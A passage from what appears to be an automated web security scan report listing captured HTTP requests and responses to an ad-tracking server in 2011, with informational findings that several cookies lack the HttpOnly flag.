rsiPus_TuCq="MLsXsF/uIS5npgAHiuo+xaAquFHWxLtwUwyTL1XC//hXGJaixt9neOzmYVtifz75nnrUC8ggvkGWKGkwE/VBlME+Q/z1CJ1IxSZ/i6GAWifDGU/pc7sD4QgyAm917NYUdYZyh7iBzZslsIabjNz4MeyillaRjQ2YsKPNRrjQY7vW1DkdAuWciLCBhlz/wrCGW8vuVAft0pSKk9JA2l6FMhjfXYeZuIYTQXTpgQkcMpDks5HxwOfsvpsaEL2NaEL8Yclw+0VwG7q3HFFj76/OIf0IMyUZCEcOHojowzGhV8ioE5aV2ws2hZ0IhhV8uOQHffx8KV33w+vWfAfqWVYrunKd0UvFGhzqCyNSeiFSR238HKp/W2VSXnq3hodOv2LuKf+45Dap1xZrLzh5Gi5QTzedauVd/OhMDVTGxhMIICko4xgErqrMKnEgSt2qIeDrG7gw738="; rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIpHt+BzRbvej2Bq1enLhfd/9JtbqrLXHQUFKY4tbWJCWllbpxhHWmZVx0ucvusEENccom1eoSelZo2bjP585/yJvVoeKdew/pWdO1jdimeNiDCHHARbNxjhgDSAoo4/VkIPbCfXmpHmKQ2aGDkRHUDSdNibk2pZTw0JCPMq3Xq1XwckwZclW/iCGeG+MScJFQLlNkJ5pVl4MLIeYC+D1SlCdtQTJiaIg7Nc9aljZsb1Ca/SZ3tYZ145L/rrf3aZbm94I8cQZYm8kK6A1uO0HVgrysoHwqzT8BslU/eEbui5J9ngByXK4NQjre/Y86s/IK64wvOZ+bh3nxv7ir7UIepY5bUmm8BGNhCfqWNXaPrkmy413T+yEP/fGrfl2WiJgj0TwaGEQ+aEyfszo2qF3z1Dc6Yt0TRP60K3wYZkbedycVWxFTylle0aaw/YlXX5xx1RItTbrQjGgWaaCGAOl8hcvHc0GreUdN/N96yJbQsBJw6shZ0xu6bNYNx26IrtaCaLz7DBu9tJohDo/d3GAg2FagmPjNGU4ScgcBHqrLCHsRHCR2S8Waj1EHDZEZdzxoV+v/khvWy8PmVPv7VibvM5ZJuPuhZHDx/MJxynPLaSms8WfLFSMRlZqiaMlJFmt4Bg9w1x84e+Ap6V+WvX/jnbPgVQx8/msu1bnCAs7D1pjP5ec9fUCgKe7zoYZTtPett2030waCrufOvU/q8Kulj5qiEBP8l63DiFJJtLuHlcsOQ2Fk8zI8mrwqYhhLzc3YUKcqdD57OXX3bHf3van1fxADmyIN2zpBnbFymRX8M0fKWqei00u3BYu2AUPoT5nB019kNGZqFd1GOAElMGa1tE3ZUlSk136ZpEEzTMJKP8hr084Tygxm/mq1e1EGTOEVgOlRNSetBtvL/tFWmx5CRf+xsLuQgiB9P7F4gyIC7aoKM32/H4iaaJPtORccErbqprWuOPEWC1TP35spsis5lGm5x+Z7r7QPpX8exQbi/B/XCI3dFJYv88HFbiXpOKSXzk5oggHRyX9dOkLuQwCIHM5E"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Tdl="MLsfsN8vLi5noAD7UlKmCeGhAP46rO3VGVkG3cTC//hXKAVhzgsM6n2u8NRAWCkwlkp7R909rxgJCSUtdP90+WpBKh3IxnnSa60vjSMgeM3M44P2Q1ZKaAXQA4Udgxl7mFn8VFA6ipHDpoTUG7C9O4Pgwrt6fMYG/9KOBspe5ouFNDa0I7gFKjQsrEteLApaz6BmjLdCFyzK2wedlrfj6DaeG4uph8ScspDLsRtN7zgovFWn//4xxFM0gmMmOEDx6mFpU1ph1l7pmfjORzRcqnchOSoFOGsUDQhhACxTEZ4J13w5/3NSjHEjPNR07flIaq05tjTIfQZutqXMdI6DW89PNtY8I2NGUxNCbLkconRe3ooHr9Swk6WnhMhNRTkI5FBYw1wZ9yH3LpE69Xhru4gA29szeKRgLSKhYqAoD4rBu6sD2BKS56+x62mm6B5tLFus+g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/FHOQ/3m1TMxQXtpPTY8fzxzQOBeO684d/jQXWEgaK2R2azl85fUjtK5ppvPF7qk2Vr6bPPmSLwphIhajDBl0rnMASBSRnSA8xpTxeM8XzyCQN5TIxZ/s/aZ5XnGxJxUXcZRLdXBHwHByl6GjhIRC5n29D7kavYdN3qHN067tuh4CDbjWHZdTUvEuVr23mdHzW8yzODK3m6vgHsu1kgSSqpQz70pwaPumeLTWUxOPeBw9zt8qvD+QM5nom0E7zgIyrBi+4MPVWykC5jJT0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7Js6mgo5TvULYFQpGvTyC8PK6mLXr2nCU/nXAmAOt3bjs1cUDhPSfryi1ki9m18xO50tPZic3KFyD7mUMUTo11xkNFkmtQ0ak0Ddw2OOm4XjS9UNoeKONnaTN7hpy1ub3Qsq2v4VKdakoR3Z+6860bM9tT5ZGCTMBBbojyO8DznzR+wyGUYzy5iwxT8wQ6L8ziZzQYge0ny0CEHBzXMOOUJ6F+sJcHphZUAKXYhqr4nioB2oe7kwRXoBeRITYepdRPWM+wuiHH5pL7B+BzYk6YgIfDqNVzD8AVH1fs+3PkRwHVqPInmyKtgJtcBsSEE6isuPUnMIk9uewP9gyI25nrfM+xgiSJaURZYOeh64cPGKyPynabpuplK9dVjEmyyHwdTodTFbyIAAmooYKgKS2eXuWhJuYbv5AuB8Ari+Tj5AbYFJszJ7DDQtfaOdhpShAHERDrQaK4MppXYRzA6yrVm3vG/FhKVgwg2tpjGgO/+r32Y9Zm6Xk5N16frL9RXFo7PRggasG1LLW/N8pIXUZklt2gXs4tWonag4SY7fzSCSLQnfFYbZS0C9g4ZQQJxpOTTkqEweKtTBlPIpNfRRbwI5vs3nWuPg8gCnCY5PUzOIT8S1kAlHovix7kguSt5/64A0p0bJlGt+Gc+2cNCNKeRZnnrXGoEIIfMDxUZJ5ctMfFVk8nGKBUGP7gt8ZfAGFI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:55:22 GMT

13.60. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_vHAg="MLtXrtMvsT9nIAG3VrwFhfjWOcNPjZk2OWir6JCihWxgb9Moc8z8fTq2sJlL/BuYW4dHbu41+HA0cx/jxufMhpPJwuid2e33gSvDA8DuTrJqEkx+6zx+C5wrm15kHKWeC3hvfiGDXE7WOEOayfaDrq0es/h3KKmPVAKrqUDwLP8TFWccB5Vqn1OtBLTOp3vQ2aV2kToAJBEPmTXo4g/gZeiO/iALj+tlFL/yaEo6Fc+NhzVjz577Z9AR/J2JwZe+FB4XdCMXi8XkJdvnLzP+aRWrfgYM7MpbCyZV1MOtgXYdwwy2egw4fNgN4iLyz2kDV9VRwSd6q9dVHChYo01BH0CYjrabX/PwIl41yA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJUmnfxIY1E2uu4kIoUKZSPJB8PrRdps8TGitorbJI7W2TIocxd22NtOpoxNEX7VcKjs47Gfe06wekyPYpBMP3KIiBU+UEHNKHhpWzizP4IMWx1/r492iGbZN9WLD0DOxW+PPqT0DPePjfzyNbswJnkDffJIkapARCeaosvrQeWmq7zUkRwAcfHvN38xU2kiJ4c2C5I3tHXxw4/tbAVI3M2twpRvuKxzmZYKoIrlwTaPFg06ijhKmoekUWQoqtBRcZZ9TlKeelxoGPGNhc6eWMe3cm/ySHVtpaGMa4BMarnFhVq5CgQm39zmFoBW5ZgfnX6d/CX7kt7hepovSV3Nar2+Og4UP1+Rm9e4CCmDbxe38mns9fRRAzDyWIx28qgZrZfJ61vLhzOpv10wkGNvJcHZVMIObXMsV0Asu83RG74oCqtoHDjDM8QgiiSe8FUYINvP2cIp/C/kRdSECmnvtAyqh1KCgRJzLhTZuR3CK9+IU9rKbxPiHNpuKPe5SXre19g43/0jMb/qAjjjAYCKAsBLNH+T4tkhNwmjP5wy+8iSVoxfZaJzsSFsUogXfOA16A+F1v0f7YQPYLaiToYd+pDKU1WxoL0uRYagECWcQb6Z3nAoFvNweiHlX2SKhexNM4nHrYy8BbmYNg8SmCU0pOV1B5ZW4FxlJthWfQWZrYgE3YnvmYOUVrHkXdbCpoU8UWTEmTI53YnOuOAlS/G5csBvUjueJeU/93qe2eISmVgJEzvCPwpqtm6PwrLjN8ekcOE6iso2ZUegI7jS4GmET6Toqj4uL0oiibRnSCQ+J0QUDXklh6EIVGkXlZOIZP5+jk2gZ0EF/T6DVBTa0+PrMtJAX2Pj7sqJYXcDaRUDi45V4a6QCi1WJ1kgFEXkVzL5biRujTNq0cVPHDkMtrwb9"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPF50OBLwIMpzaxu2HQrcQb/coAaHhJAbenh/Nv2MY6n2e1NDCNnYNPat72X0BRE/esU9+EywiROtUTQMbYBq9rnjjNjeUEe32iu1AIHKjKt7Fndxcuv+HBYCNWc2u0r9BSCGY0lWYHj0kddsl153LxKPjEBRX4N7YV+UiL596yc+/XaoxpnMq8ClHjz4GUV1zPVpVxAexnxc2VYk2J5ZWkA6vemmq+Y9/WiNZNbE26sdYD7pwlP0xb58DJLaJ0BMJfjTLY4z5F45OKPR1pmg==; rtc_rnU6=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFukH2RhvePE26HoeBFV5kQJR5W9feBwQwoflnJmU9r6cb2JZX//hGGENc5px9phZOkJGucNggdRkYXvY5K0=; NETSEGS_K08784=d303c7ec11fd6a67&K08784&0&4df176b8&0&&4dcb4af6&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsiPus_2ZJb="MLtHpENqcx5zJhHBQhzgK3He1h3aw0A6X7azDvfHiMlclO1tdu0KektdKeHwXOMUVaY0m0LaKBIUQalgzzr5lW6q66bvi1YGG7mt0omOkv2p3Q6RiqmtjSbwxbOimlKBmUyhIXN9/LP5pQA1ehm/668seCfMvdSvlIxG3tTaJfxJReTn635WKmfzlxcpiRFzYIxojmq5n0Tys9BIlVqMmXcMtRpx"; rsi_us_1000000="pUP1JklHPwIc1Q0VwanxzTdZ2/4zipi5ZKPbd2VLfdV+lkvoeIlE1zSxcznS+KoMhK9YJjmf9c9L18zMUhyaykGFMZvgZU3jUz/3lEOhU8+qOw2xwHoAsehEGwZghimo44CM1p4MyHfzZA4pubseNPAZ4Kq5ZLrL+f2zP54lvTyPjNv5lTWNX3eNlDoYI5sG9IOCN+h++nZnkwV+owEaMWKHRCvMOHtvmIcm+ypY5ReMHXYXlUoOjAl+EMQObFf5oKn272NxtqmL/6LHIlDedDScq+nhOP6NpxNEVO59dmN1MfnbehHp68hDiBM+TmRxuiwlXYMug+KIR0pGFks1aWnkiZuLZPAr9x/5PmrH7yO/xeYpMGHl5ZXnxsnNbTf+L+KFFTnzBb+DMQmY7Xt2MO7m1LJWRIZxrh8jv+ccXEXSLjnwzKY9qynUrWmwVJ+nOQyqEa4OleB/vNRTSKkgls0Lpe2h9As/5kth06ZOY3RR3bruhoruZpRPZnMFnBVLGw/vPThxMoZijl7d9ttwNd2WU7aTfvZuDDtGZBcEVyhi7NEajfyFTDB35Uwu0QI3Ug99pST7MfmQXZVSUeJ7XS1tJSPSDsp8i7ljY13vOyJ7+GDNyblrjs/vDLxJWssKpKc="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vHAg="MLtXrtMvsT9nIAG3VrwFhfjWOcNPjZk2OWir6JCihWxgb9Moc8z8fTq2sJlL/BuYW4dHbu41+HA0cx/jxufMhpPJwuid2e33gSvDA8DuTrJqEkx+6zx+C5wrm15kHKWeC3hvfiGDXE7WOEOayfaDrq0es/h3KKmPVAKrqUDwLP8TFWccB5Vqn1OtBLTOp3vQ2aV2kToAJBEPmTXo4g/gZeiO/iALj+tlFL/yaEo6Fc+NhzVjz577Z9AR/J2JwZe+FB4XdCMXi8XkJdvnLzP+aRWrfgYM7MpbCyZV1MOtgXYdwwy2egw4fNgN4iLyz2kDV9VRwSd6q9dVHChYo01BH0CYjrabX/PwIl41yA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJUmnfxIY1E2uu4kIoUKZSPJB8PrRdps8TGitorbJI7W2TIocxd22NtOpoxNEX7VcKjs47Gfe06wekyPYpBMP3KIiBU+UEHNKHhpWzizP4IMWx1/r492iGbZN9WLD0DOxW+PPqT0DPePjfzyNbswJnkDffJIkapARCeaosvrQeWmq7zUkRwAcfHvN38xU2kiJ4c2C5I3tHXxw4/tbAVI3M2twpRvuKxzmZYKoIrlwTaPFg06ijhKmoekUWQoqtBRcZZ9TlKeelxoGPGNhc6eWMe3cm/ySHVtpaGMa4BMarnFhVq5CgQm39zmFoBW5ZgfnX6d/CX7kt7hepovSV3Nar2+Og4UP1+Rm9e4CCmDbxe38mns9fRRAzDyWIx28qgZrZfJ61vLhzOpv10wkGNvJcHZVMIObXMsV0Asu83RG74oCqtoHDjDM8QgiiSe8FUYINvP2cIp/C/kRdSECmnvtAyqh1KCgRJzLhTZuR3CK9+IU9rKbxPiHNpuKPe5SXre19g43/0jMb/qAjjjAYCKAsBLNH+T4tkhNwmjP5wy+8iSVoxfZaJzsSFsUogXfOA16A+F1v0f7YQPYLaiToYd+pDKU1WxoL0uRYagECWcQb6Z3nAoFvNweiHlX2SKhexNM4nHrYy8BbmYNg8SmCU0pOV1B5ZW4FxlJthWfQWZrYgE3YnvmYOUVrHkXdbCpoU8UWTEmTI53YnOuOAlS/G5csBvUjueJeU/93qe2eISmVgJEzvCPwpqtm6PwrLjN8ekcOE6iso2ZUegI7jS4GmET6Toqj4uL0oiibRnSCQ+J0QUDXklh6EIVGkXlZOIZP5+jk2gZ0EF/T6DVBTa0+PrMtJAX2Pj7sqJYXcDaRUDi45V4a6QCi1WJ1kgFEXkVzL5biRujTNq0cVPHDkMtrwb9"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:40 GMT

13.61. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_cq85="MLsXsF8ubi5n4JDyzowlSBbxpQnwGsaEu/PC8n+5VFKBZFiot29LyxVRkzZAFjNpcJ1iCf5x8wb47OfER+70+KpE+UnSMkbFSIrdk96nO3UaWMTESWUpK3OqyDwU+EA/5R8Xf2DD8x4RmpjwIzLVwKiwQ3OFNmbSHqqZn5iMigi7JoO6ztNRmL1mxYWhBSC0DILl88ybW6M+cQpWnZDY0MdXGPdCs6Dk6T/5787NFvTrHYiNQkaAQXrvVknibEJ2Q3EEI6eA8RHWXnsWl3dsumEcJ4AZQLWPtn8GUbAKtpnDk4QG8tRZvs9uUMCro5ahZOoKWY/NuurXK+xiuXPUMnMlb9G3jNnS1qDw5q+tUhXm3KfSyzsyTJOTgNUtMpTnWzmQrnEghGoIuyZuaegLwU8Hbd5/IEQzTkZ8de2MzHz5ZbekRfbuw54TFc+0wtgB9f5ZYPt8rOk="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE9HCAYYlW23lB0u4DcmSH3vrseeRRdc+/iC2/EpD4wnnWVpr8KNuLTYoCJisXn5HT6xtGlexMb/gCd8NEgmVWrScu+R6IK9f5q3gdIzGYbvvIWq2gHYcb6WtSO2eXRkOJUg0hglaqnjXXwOtkFUCqodVLjnzxSp/ocGHhDb1e+NKdqA60VtitzaEjn333JOpoKabSD/s+4LcFeRFZTgI55WVwB1oQEDOQBU6Kcx3qbkKAZeLnuEILa513lbVZwiijORoR9b+gLscYYm9oc4YXZYG+kKyAKVGk23nIxNwnZE+ztabap2OEbvi5J9kgByXK6iiY36G9CAOp6W3g6HPohG+1esZzkKXUpCJfNXJuWR/nAE4eRcT/QWS3w947o39G+CKm8b1hgMDcaOwXgr3SDf1gr6+Ur3tB69BQlRKyHuBuJwKsma4HIdpkK0aaox773kdEYdgUlodh7asCKRrRcMMN3FLt/HISxWSaLQ30YAt1VAMwzttcWOYkEu+j0G7Q9hAKyh18R9a7kSQoFt3+9406AJ0FDSG0olZv0hovf+CndgqByq4SVT5LuB/xh7yEugipKJGSdZw9+k8qOSyv7ni4dw8f5kbgwpNfRIQ4epfWPOOy4uiHB5JZ7B/iTUk77AIXjpdUzD4Am1JWZ3fEOvztWHc4smVf/rFfjhsENJq/YEjZ8GZUinFSFyJWDDCKPQ8It6StqkbwjLbk25MlGZZer7Nk4G1fwGl69syX8EgKN+qKDQqnJmm9PC9SfkTQoBtDA1jsm7/Io7mjIY/Bp/ykaRtJZsNvAN4KR01lPxjycRQLEMblStMerh9Bqya5ugvWOHNRCfJ9ZFRMFWmNgmblJiFUoUyJIwzFeLMss/mSBKB2IJ2CztZJjB/Eo+Q4k27iRW/HbnkgY6z6wwSdm2l4MKREXIPLmRzVQ8lkszqQl1S8Z7mjnNwqtKTjpyn6PKTiX/9dh5XffRWEzn0zymQBTAy55jjM7Ilqs1haSE+cov/8/4FeGVFGUebrMZKyv9aG2VN9zz6aOQJLA22YS4NdmcEQwNAT2mjcPDxTrEzm0SMIk4uw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=7050454176496.714?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_eR-U="MLsXsF8ubi5n4JDyzowlaElL3byjGsaEu/PCsfHs+PiZBmLkCOD/CYU4iQ1FIB9JIdEuByvn+LmEbSTfL+ykre7wDUIX/wZ6lnteDZlY2GW0rSpVxafl8+M3Fk56Oh4ptMD+hYqX/cAyWYPZh9GLnbzcK72OcuSYGrrJEpXB+DSR95aZykdxmdsZqoaEFcUJuWv1BvXF/JDG/GCNqis4ms/VQEqjV9l+cBVLcmp3g+IkQxuhqkO4h33GXxQRehGwbDMII/X908qfFBBE/BhoJgSDVTQJgbfrr9VStGZJoYAHBxqDSrtQR7zRdEPW+PODtnDjF0aDwrfsnCXsDZAllz5pIm7H8vTOz6Tp6rXuoEwC4tmm90X2zzZQgJINuTSRjmwwSlO3YJyhcZWsYanJtkzqYPXKdjC1vv14LmMCzQv0FuHGVbAUx1aTy5CEjIMWepRHnGiBj/50"; rsi_us_1000000="pUMdJE1DNwYU1Q0E1idLvS/Qn1LhCaXl4R9qqwYfg6rt2+BCR4J+oeH8rPyHk4Hhw5b9xqtsZIdLnAad3UntXGuWxHrABhvpw7cPDxvXQRN62WmlqhL4fC7+WOSMq+dvWgT4ebPl2lFpJuP7uXyCyqg4XAT44TBqEswHmQT5L4Ra/sPnYBWm9xMVQXMRRKtR9GzhJyZLGjpIBA5vWbPzkqrcTd3qbM08co60XhnAKcmrFRUrEudr+/kKU87L0BiqM70g5syIrFQBrlIuwD70ryaPu2eDT20zv7ah015/q4awN6VJ+8rsxj6XZD+0i84pw6Gy6i8fKsPkE8uNlzhWUSTmQhNHOW+k5ncmOAas7xfJ4rqL6ScIwiRVrTreOaLihWYFvg/BJGpbqqkvRbSEeFyZ5KjlpwyIYLwxe5zlFun9kh5wTX7ejF0QZcJtI9kBsn7Lkf5sMuCroQwb82dLm/jPC6EsMPT0XkFh5S98efmvFzOLVDMbgwQfSeonUcsOVnqT7qVHtsDZmgLzokkYy0LbaRGOiMipFRWwDEj3guK/+YGv/C+2fgu0fiORZyKR3jB4N/e6B32HOXDw9nbXtgxToquUZ0Jbjde1ZEuPl4zBTScNWkKfhPjGddppEEFIZw4zrfFa8LgPIBu67lO4i/5H0GaIz9kpcCmZrWX9vOf1HuNbA/tDWC/dJ/w84saSyOHCom0UPlRlu5gF0gnYI4FXWF36+CMlx16c5rjhTlGIIxRDCjW4DfnlpqP8DtNn6e8e7Hq0kIY5aruJQOtYm8IY63ik0p+xKL6x/CQZu7dhDEdqxpDgMf097hSt8cpxx9qylfs9ZTTUaJbwSuQ9HHojxHU2cjzd2kVEcDjTdtSJ0CXD7BBHwg51a2ApHdMJXw5+CREwr4B3pSD0g24vvqG+sWzcENOyHgGktJc/jU1UciLYFrFNu/IYCUeV/GvJyS0qf6LOzhGDndsN6oL4iKMbxnwWClajU0lGucg1dKqXHu4gd8sp27c/dcEJPiOi9TLtSYHz6A0onmkiY/c0dk/B7LDgldJHmYwSTJ1yHydKsSFjNsXGfGeq"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
